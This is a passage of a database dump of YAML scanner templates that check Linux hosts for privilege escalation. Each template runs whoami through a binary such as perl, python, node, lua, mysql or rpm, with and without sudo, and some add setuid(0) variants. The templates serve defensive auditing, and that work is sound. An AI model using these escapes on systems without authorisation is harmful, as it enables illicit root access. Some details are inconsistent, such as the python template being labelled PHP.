ltrace - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n ltrace is a debugging utility in Linux that is used to intercept and record dynamic library calls made by a process. It can be used to trace the library calls made by a program, which is helpful for debugging and understanding its behavior.\n reference:\n - https://gtfobins.github.io/gtfobins/ltrace/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ltrace,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ltrace -b -L whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo ltrace -b -L whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100f11ea8058ebe8897f65ca06d6405192f055f3b89df0d17241169b6a03b67e64e0221008fd51a442385bf5ff02bb50c6c79399067a111e382deb244cd0cc5dce10bc476:922c64590222798bb761d5b6d8e72950", "hash": "f0859fe03f44d79c9c07412a13fbd5b3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4f" }, "name": "privesc-lua.yaml", "content": "id: privesc-lua\n\ninfo:\n name: lua - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Lua is a powerful, efficient, lightweight, embeddable scripting language. It is often used as a scripting language for game development and other applications that require a customizable and extensible scripting interface. Lua is known for its simplicity, speed, and ease of integration with other languages and systems.\n reference:\n - https://gtfobins.github.io/gtfobins/lua/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,lua,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n lua -e 'os.execute(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n sudo lua -e 'os.execute(\"whoami\")'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950", "hash": "1c7d86319b0c016d00f3730a59b1a0cd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c50" }, "name": "privesc-mawk.yaml", "content": "id: privesc-mawk\n\ninfo:\n name: mawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n mawk is an efficient and fast implementation of the AWK programming language. It is designed to be smaller and faster than the original AWK implementation, making it suitable for large data processing tasks. mawk is commonly used for text processing and pattern scanning in shell scripts and command-line environments.\n reference:\n - https://gtfobins.github.io/gtfobins/mawk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,mawk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n mawk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo mawk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502200df72b2069096e548940fff30c33212d8fb9d02c2ca03323f5d7bbee8e35287a022100f1f693cd49803f304a8b40d5e633bbbeb5f9e58ded1142fbe9959879e2dd6a2d:922c64590222798bb761d5b6d8e72950", "hash": "41dedc13dc4c313f0a3993ae09f13572", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c51" }, "name": "privesc-multitime.yaml", "content": "id: privesc-multitime\n\ninfo:\n name: Multitime - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n multitime is a command-line utility that allows for the timing and execution of commands multiple times. It is often used for benchmarking and performance testing of commands and scripts, providing a convenient way to measure the execution time of a given task.\n reference:\n - https://gtfobins.github.io/gtfobins/multitime/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,multitime,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n multitime whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo multitime whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c399cac22f29d39aa0a2894a998683589976aba3c286799d652b025e66442906022100b48b165b549c4e7a671efc02cccc66b8207eb424e817090713c2e4a4ed1bacec:922c64590222798bb761d5b6d8e72950", "hash": "ba24cf72814ebccf0b476e68778c0c91", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c52" }, "name": "privesc-mysql.yaml", "content": "id: privesc-mysql\n\ninfo:\n name: MySQL - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n MySQL is an open-source relational database management system (RDBMS) that uses structured query language (SQL) for managing and manipulating data. It is widely used for web applications and is known for its reliability, ease of use, and performance. MySQL is a popular choice for database-driven applications and is supported on various platforms.\n reference:\n - https://gtfobins.github.io/gtfobins/mysql/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,mysql,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n mysql -e '\\! whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo mysql -e '\\! whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950", "hash": "f7356f6df9a399ee92ca9fd28b9b78c6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c53" }, "name": "privesc-nawk.yaml", "content": "id: privesc-nawk\n\ninfo:\n name: nawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n nawk is an implementation of the AWK programming language. It is a text-processing language that is commonly used for pattern scanning and processing of text files. nawk provides powerful features for data extraction, reporting, and manipulation, making it a valuable tool for text processing tasks in shell scripts and command-line environments.\n reference:\n - https://gtfobins.github.io/gtfobins/nawk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,nawk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n nawk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo nawk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402203a9652dc49b3c404e11cdd93d124f05d18e06dc8d66199c14ea83e0761ceeec002207922dc474bbc053a9a488fd0b912d99a77ab120527be55d4b64b01a2499a83e0:922c64590222798bb761d5b6d8e72950", "hash": "099866a2db68d07902d67c79ec6e75e4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c54" }, "name": "privesc-nice.yaml", "content": "id: privesc-nice\n\ninfo:\n name: Nice - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n In Unix-like operating systems, the nice command is used to execute a program with a modified scheduling priority. It allows users to start a process with a specified priority level, which can influence the allocation of CPU resources. This can be useful for managing system resources and controlling the impact of a process on system performance.\n reference:\n - https://gtfobins.github.io/gtfobins/nice/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,nice,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n nice whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo nice whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502204e1d35336c62b800e25524ed45bbbe4acca9c38c86cd8759c0332b2677e4559a0221008fd313e5d3acaafdf394ef3807440de278980f99511f2de4a579e11d09588a8a:922c64590222798bb761d5b6d8e72950", "hash": "66de34924a74d90417a8e453a534747e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c55" }, "name": "privesc-node.yaml", "content": "id: privesc-node\n\ninfo:\n name: Node - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Node.js is a popular open-source, cross-platform JavaScript runtime environment that executes JavaScript code outside of a web browser. It is commonly used for building scalable network applications and is known for its event-driven, non-blocking I/O model. Node.js is widely used for server-side scripting and has a large ecosystem of libraries and frameworks.\n reference:\n - https://gtfobins.github.io/gtfobins/node/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,node,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n node -e 'require(\"child_process\").spawn(\"whoami\", {stdio: [0, 1, 2]})'\n\n - engine:\n - sh\n - bash\n source: |\n sudo node -e 'require(\"child_process\").spawn(\"whoami\", {stdio: [0, 1, 2]})'\n\n - engine:\n - sh\n - bash\n source: |\n node -e 'process.setuid(0); require(\"child_process\").spawn(\"whoami\", {stdio: [0, 1, 2]})'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950", "hash": "547d6e659fe20935c7b6ddd460e6211c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c56" }, "name": "privesc-nsenter.yaml", "content": "id: privesc-nsenter\n\ninfo:\n name: Nsenter - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n nsenter is a command-line utility in Linux that allows a user to enter into an existing namespace. It is commonly used for troubleshooting and managing namespaces in containerized environments. By using nsenter, users can enter into a specific namespace and execute commands within that namespace, which can be helpful for various system administration tasks.\n reference:\n - https://gtfobins.github.io/gtfobins/nsenter/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,nsenter,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n nsenter whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo nsenter whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221008bd4125fd80c48fa98d3c5ccb0b0a5ed44c771a6b53ff6b496c9e15836ba48c5022100a2aa9667f4688e889be09561ede2e6bfe414b25f107aee2f3370d5e34abfd1e4:922c64590222798bb761d5b6d8e72950", "hash": "d1796b1e83f9ec0643c7886e9997731f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c57" }, "name": "privesc-perl.yaml", "content": "id: privesc-perl\n\ninfo:\n name: Perl - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Perl is a high-level, general-purpose programming language known for its powerful text processing capabilities. It is often used for system administration, web development, and network programming. Perl's syntax and features make it well-suited for tasks such as parsing and manipulating text, making it a popular choice for various scripting and automation tasks.\n reference:\n - https://gtfobins.github.io/gtfobins/perl/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,perl,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n perl -e 'exec \"whoami\";'\n\n - engine:\n - sh\n - bash\n source: |\n sudo perl -e 'exec \"whoami\";'\n\n - engine:\n - sh\n - bash\n source: |\n perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"whoami\";'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100dee9666c916f48b5deeb7004464798e74b6e1c3246e25d6131aa863fc6371435022100bf2eb4cbde6f6caacd93dfe536844a03f99b5984d8dcfeba78f5b8623dadaf58:922c64590222798bb761d5b6d8e72950", "hash": "19573883cc88f0deb03375046a342be3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c58" }, "name": "privesc-pexec.yaml", "content": "id: privesc-pexec\n\ninfo:\n name: pexec - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The term \"pexec\" typically refers to the \"privileged execution\" of a command or program.\n reference: |\n https://gtfobins.github.io/gtfobins/pexec/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,pexec,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n pexec whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo pexec whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100ffd73bbffb6b8f255e4ff49596ec507fa0fad10e1860aebf788009fa3ec362700220789321e46690714047244d7c81ba5e4114f3bc1e6a2e6c8c9ac45182b5feeede:922c64590222798bb761d5b6d8e72950", "hash": "4a83b78e8f6c361cff6ad6d9dbfbd22c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c59" }, "name": "privesc-php.yaml", "content": "id: privesc-php\n\ninfo:\n name: PHP - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n PHP is a popular server-side scripting language that is widely used for web development. It is known for its ease of use, flexibility, and broad support for web frameworks and content management systems. PHP is commonly used to create dynamic web pages, process form data, manage sessions, and interact with databases.\n reference:\n - https://gtfobins.github.io/gtfobins/php/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,php,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n php -r 'system(\"whoami\");'\n\n - engine:\n - sh\n - bash\n source: |\n sudo php -r 'system(\"whoami\");'\n\n - engine:\n - sh\n - bash\n source: |\n php -r \"posix_setuid(0); system(\"whoami\");\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502204dea2deccea922ff402d0898f4f4a3ca9044ff4b156bcdb80782ccbd05471597022100ecc5ce20f2433825d62d6abd9ac88e44ebe050d8a7832cfdbd54d850ab3357f4:922c64590222798bb761d5b6d8e72950", "hash": "996b205aa449d0342866d1ca19ab0c49", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5a" }, "name": "privesc-posh.yaml", "content": "id: privesc-posh\n\ninfo:\n name: posh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n \"posh\" typically refers to the \"Policy-compliant Ordinary SHell,\" which is a restricted shell designed to provide a limited set of commands and features for users with restricted access. It is often used in environments where users require limited functionality and access to system resources.\n reference:\n - https://gtfobins.github.io/gtfobins/posh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,posh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n posh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo posh -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100b3a4f4aaf0ece3b42f474a0a1715a494b1d5df6afece578ab59e6a362c3819c2022100ec82fdef145ace5edaeb1d7f603d674423509053a71415bfd189b2628bfd419d:922c64590222798bb761d5b6d8e72950", "hash": "a93784df413006df3393966746965912", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5b" }, "name": "privesc-python.yaml", "content": "id: privesc-python\n\ninfo:\n name: PHP - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Python is a high-level, general-purpose programming language known for its readability and simplicity. It is widely used for web development, scientific computing, artificial intelligence, and system automation. Python's versatility, extensive standard library, and large community make it a popular choice for a wide range of applications.\n reference:\n - https://gtfobins.github.io/gtfobins/python/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,php,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n python -c 'import os; os.system(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n sudo python -c 'import os; os.system(\"whoami\")'\n\n - engine:\n - sh\n - bash\n source: |\n python -c 'import os; os.setuid(0); os.system(\"whoami\")'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022042e3fab21f07a128fb933363cb4ba5a35ecab9338b906ac0404c149fa6d14384022100e8bfb2f3450a973d8926379260d5b9ea8254fb079eb27f64528850628716bd40:922c64590222798bb761d5b6d8e72950", "hash": "e16facd3370b1f0c4c708fb606c6d218", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5c" }, "name": "privesc-rake.yaml", "content": "id: privesc-rake\n\ninfo:\n name: Rake - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. Rake is often used for automating tasks in software development, such as building, testing, and deploying applications.\n reference:\n - https://gtfobins.github.io/gtfobins/rake/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rake,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rake -p '`whoami 1>&0`'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rake -p '`whoami 1>&0`'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100bcc90916fbc2d8890295da859b0fecac95786566b6f62f7fbc80af89a234f691022035104e4e99936ec941983b0706403cad8de163e482d76b90a7c093889da4e618:922c64590222798bb761d5b6d8e72950", "hash": "4e5b5ecff7ef57792fccdb3b7424a99d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5d" }, "name": "privesc-rc.yaml", "content": "id: privesc-rc\n\ninfo:\n name: RC - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n the rc command is a shell command interpreter that is used to execute commands and scripts. It is commonly used for scripting and automation tasks, and it provides a set of built-in commands and features for interacting with the system.\n reference:\n - https://gtfobins.github.io/gtfobins/rc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rc -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rc -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950", "hash": "654990a801baf49c8579d913d89ac2a1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5e" }, "name": "privesc-rlwrap.yaml", "content": "id: privesc-rlwrap\n\ninfo:\n name: rlwrap - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n rlwrap is a utility that provides readline functionality to commands that lack it, allowing for command-line editing and history capabilities. It is commonly used to enhance the user experience when working with command-line tools that do not have built-in readline support.\n reference:\n - https://gtfobins.github.io/gtfobins/rlwrap/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rlwrap,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rlwrap whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo rlwrap whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100dab7e9bf7b1719b4301f98a31f949b85357909fe334d985657b0ca00021c4fd2022012ece57975d17e4c936529044eb28802484f3d6774f16a6b10c0e1c68d46fa66:922c64590222798bb761d5b6d8e72950", "hash": "79e933179f297a6c12a70cc59a329e9b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c5f" }, "name": "privesc-rpm.yaml", "content": "id: privesc-rpm\n\ninfo:\n name: rpm - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n rpm stands for \"Red Hat Package Manager.\" It is a command-line package management utility used in Red Hat-based Linux distributions to install, update, and manage software packages. rpm is also used to query package information, verify package integrity, and perform various administrative tasks related to software packages.\n reference:\n - https://gtfobins.github.io/gtfobins/rpm/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rpm,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rpm --pipe 'whoami 0<&1'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rpm --pipe 'whoami 0<&1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100f9ebcba2d19a4526e7f5e57c7f6689b357d2c494430888e101be24cfc76be06402205cb441dcdec04e9db9d615c66db8e622566f28ac363ca56cf663e53e0b37a139:922c64590222798bb761d5b6d8e72950", "hash": "ef085462bcf51977f12db52a63ade3b5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c60" }, "name": "privesc-rpmdb.yaml", "content": "id: privesc-rpmdb\n\ninfo:\n name: rpmdb - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The rpmdb is the database used by the RPM Package Manager to store metadata about installed packages on a Linux system. It is used to track information about installed packages, including their files, dependencies, and other attributes. The rpmdb is a critical component of package management on RPM-based Linux distributions.\n reference:\n - https://gtfobins.github.io/gtfobins/rpmdb/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rpmdb,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rpmdb --eval '%(whoami 1>&2)'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rpmdb --eval '%(whoami 1>&2)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a004830460221009502409087b740c10114c535f7abd42452ac96396a499f4077ab39d10ddaeea5022100da28fa2b0501c790c92d5ed0e6099f9b9fe0d244cba2d0872422816b67d58e8c:922c64590222798bb761d5b6d8e72950", "hash": "88d4f2953361c6788d09c36df21408c8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c61" }, "name": "privesc-rpmverify.yaml", "content": "id: privesc-rpmverify\n\ninfo:\n name: rpmverify - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The rpmverify command is used to verify the integrity and authenticity of installed RPM packages on a Linux system. It checks the files in the installed packages against the information stored in the RPM database to detect any modifications or discrepancies. This helps ensure the security and stability of the system by identifying any unauthorized changes to the installed packages.\n reference:\n - https://gtfobins.github.io/gtfobins/rpmverify/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,rpmverify,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n rpmverify --eval '%(whoami 1>&2)'\n\n - engine:\n - sh\n - bash\n source: |\n sudo rpmverify --eval '%(whoami 1>&2)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502203fe3d7509151bc933a63ac20e2602cb1d62735696175b3eb299ea765d5c444d6022100a14058c9b7bcaab524cc9ceb95ca35be80bd2d0b16b4ab902cadbce169734d9a:922c64590222798bb761d5b6d8e72950", "hash": "3e11ebd72d050f1de4746ec871cccb0c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c62" }, "name": "privesc-ruby.yaml", "content": "id: privesc-ruby\n\ninfo:\n name: Ruby - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.\n reference:\n - https://gtfobins.github.io/gtfobins/ruby/\n metadata:\n verified: true\n max-request: 4\n tags: code,linux,ruby,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ruby -e 'exec \"whoami\"'\n\n - engine:\n - sh\n - bash\n source: |\n sudo ruby -e 'exec \"whoami\"'\n\n - engine:\n - sh\n - bash\n source: |\n ruby -e 'Process::Sys.setuid(0); exec \"whoami\"'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n - 'contains(code_4_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100bbc6742bc67c075cd2c8607c45ea1ff15ea6427a25a7d6dee8d78743473c0273022100df262f72fa5cffad8d2e1340fffe33e1a58b8bbb5697a8360ca082760d5c5924:922c64590222798bb761d5b6d8e72950", "hash": "74f1bf0e0a417357626bfa6f5fdb5eaa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c63" }, "name": "privesc-run-parts.yaml", "content": "id: privesc-run-parts\n\ninfo:\n name: run-parts - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.\n reference: https://gtfobins.github.io/gtfobins/run-parts/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,run-parts,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n run-parts --new-session --regex 'whoami' /bin\n\n - engine:\n - sh\n - bash\n source: |\n sudo run-parts --new-session --regex 'whoami' /bin\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950", "hash": "70c371c4d700bccfc0d4a1ecae1fe797", "level": 